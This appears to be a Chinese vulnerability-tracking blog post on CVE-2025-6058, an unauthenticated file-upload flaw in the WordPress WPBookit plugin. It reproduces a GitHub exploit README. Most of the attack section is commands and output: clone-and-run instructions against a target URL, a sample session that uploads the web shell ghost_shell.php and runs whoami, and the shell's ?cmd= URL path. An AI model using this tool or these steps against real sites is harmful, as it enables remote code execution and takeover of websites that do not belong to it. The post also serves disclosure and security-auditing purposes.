WordPress WPBookit 文件上传漏洞

漏洞信息

漏洞名称: WordPress WPBookit 文件上传漏洞

漏洞编号:

  • CVE: CVE-2025-6058

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: ### 受影响产品
WordPress是一个广泛使用的内容管理系统(CMS),全球数百万网站采用。WPBookit是WordPress的一个插件,用于提供预约和预订功能。由于其易用性和功能丰富,WPBookit在各类商业和个人网站中较为常见。

漏洞说明

CVE-2025-6058是一个影响WordPress WPBookit插件的严重漏洞,类型为未经验证的文件上传漏洞。攻击者可以利用一个易受攻击的AJAX端点上传任意PHP文件,无需任何身份验证即可实现远程代码执行(RCE)。漏洞的技术根源在于插件未能正确验证上传文件的类型和内容,导致攻击者可以上传恶意脚本。

影响分析

此漏洞允许攻击者在未经验证的情况下上传恶意PHP文件,从而获得对目标网站的完全控制。攻击者可以执行任意代码,访问敏感数据,甚至破坏网站的正常运行。由于漏洞的利用无需任何身份验证,且可以自动化执行,因此风险极高。此漏洞的存在使得使用受影响版本WPBookit插件的所有WordPress网站都面临严重的安全威胁。

产品厂商: WordPress

产品名称: WPBookit

影响版本: ≤ 1.0.4

来源: https://github.com/0xgh057r3c0n/CVE-2025-6058

类型: CVE-2025:github search

仓库文件

  • .gitignore
  • CVE-2025-6058.py
  • CVE-2025-6058.yaml
  • LICENSE
  • README.md

来源概述

WordPress Logo

🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit

Unauthenticated Arbitrary File Upload Exploit targeting WordPress WPBookit Plugin (≤ 1.0.4)
Exploit allows remote shell upload and full command execution.

Author: 0xgh057r3c0n

📌 About The Vulnerability

CVE-2025-6058 is a critical vulnerability affecting the WPBookit plugin on WordPress CMS. An unauthenticated attacker can abuse a vulnerable AJAX endpoint to upload arbitrary PHP files, enabling Remote Code Execution (RCE).

  • 🎯 Target: WordPress CMS (vulnerable WPBookit plugin)
  • 📦 Plugin Affected: WPBookit ≤ 1.0.4
  • ⚠️ Risk Level: Critical (Unauthenticated RCE)

✨ Features

  • 🔍 Auto-detects WordPress plugin version via README.txt
  • 📤 Uploads lightweight PHP shell (ghost_shell.php)
  • 🖥️ Interactive shell (Parrot-style prompt)
  • 🌐 Unauthenticated — No login required
  • 🎨 Colorized CLI Output

🚀 Usage Guide

💻 Requirements

1
2
3
4
5
6
7
8
9
10
11
12
python3 --version
pip install requests
````

---

#### ⚙️ Exploit Execution

```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com

🛠️ Example Shell Session

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
python3 CVE-2025-6058.py -u https://victim.com

[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.

[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] Interactive GhostShell Started — type 'exit' to quit.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data

📂 Shell Details

  • File Name: ghost_shell.php
  • Path: /wp-content/uploads/YYYY/MM/ghost_shell.php
  • Example:
1
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

This exploit is developed for educational purposes and authorized penetration testing only. Unauthorized use against systems without explicit consent is illegal.

📄 License

Released under MIT License

Made for WordPress security auditing 🛡️ by 0xgh057r3c0n

```
Github Poc
#文件上传 #CVE-2025:github search
WordPress WPBookit 文件上传漏洞
http://example.com/2025/07/22/github_1966187907/
作者
lianccc
发布于
2025年7月22日
许可协议